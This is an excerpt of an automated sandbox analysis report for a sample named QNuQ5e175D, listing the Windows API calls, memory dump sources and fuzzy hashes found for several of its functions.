                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                          • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401EF8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                          • Instruction ID: 32ce691c062fdf7882ca7c79f7dc95dd78c7e40f541a0607bb82830de01dd458
                                                          • Opcode Fuzzy Hash: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                          • Instruction Fuzzy Hash: 3C017171905250EFE7005BB4EE49BDD3FA4AB19301F208A7AF142B61E2CBB904458BED
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
Strings
Memory Dump Source
• Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
• Instruction ID: 1a2acd516b32d4a8bba1f086ee74ddb70cdd2400578aaa813c3bd98b8eca9c32
• Opcode Fuzzy Hash: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
• Instruction Fuzzy Hash: 1121A071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B88941DB98
APIs
• lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
• wsprintfW.USER32 ref: 00404E4D
• SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
Strings
Memory Dump Source
• Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
• Instruction ID: f1ad69e943298bab6ea0b6c220370dbc78873d19d133ff1b34b391d97265b774
• Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
• Instruction Fuzzy Hash: 3011EB336041287BDB10566DAC45E9E329CDF85374F250237FE25F21D5E978C92182E8
APIs
• DestroyWindow.USER32(?,00000000,0040321C,00000001), ref: 00403051
• GetTickCount.KERNEL32 ref: 0040306F
• CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
• ShowWindow.USER32(00000000,00000005), ref: 0040309A
Memory Dump Source
• Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
• Instruction ID: e0f0fd039426b51c9db09d8e0aed7b7b9f53d87474512ec8403aba9b2c913b41
• Opcode Fuzzy Hash: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
• Instruction Fuzzy Hash: 93F05470602A21ABC6216F50FE09A9B7B69FB45B12B41043AF545B11ACCB384891CB9D
APIs
• IsWindowVisible.USER32(?), ref: 0040559F
• CallWindowProcW.USER32(?,?,?,?), ref: 004055F0
  • Part of subcall function 00404542: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
Strings
Memory Dump Source
• Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
• Instruction ID: f144bc20a23b2fc1dad06cc698734642626ca736bc3518a3bbd7873959a32aa8
• Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
• Instruction Fuzzy Hash: 21017171100608BBDF219F11DD84A9F376BEB84794F204037FA027A1D9C7398D529A69
APIs
• GetTickCount.KERNEL32 ref: 004060B4
• GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403550,00441000,00441800,00441800,00441800,00441800,00441800,00441800,0040383C), ref: 004060CF
Strings
Memory Dump Source
• Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
• Instruction ID: 0f0e971a11aa9000600537ad3b21051f2e76e4828209a3ca974843c19b3e0847
• Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
• Instruction Fuzzy Hash: B5F09076B40204BBEB00CF69ED05F9EB7ACEBA5750F11803AE901F7180E6B099648768
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FF4
• CharNextA.USER32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406005
• lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
Memory Dump Source
• Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
• Instruction ID: b896d6fd3cda69cb85c158c7a33f171d68b8f81fed19edc6c2f6f75b2124ada4
• Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
• Instruction Fuzzy Hash: 64F0F631104418FFC702DFA5DD00D9EBBA8EF45350B2200B9E841FB250D674DE11AB68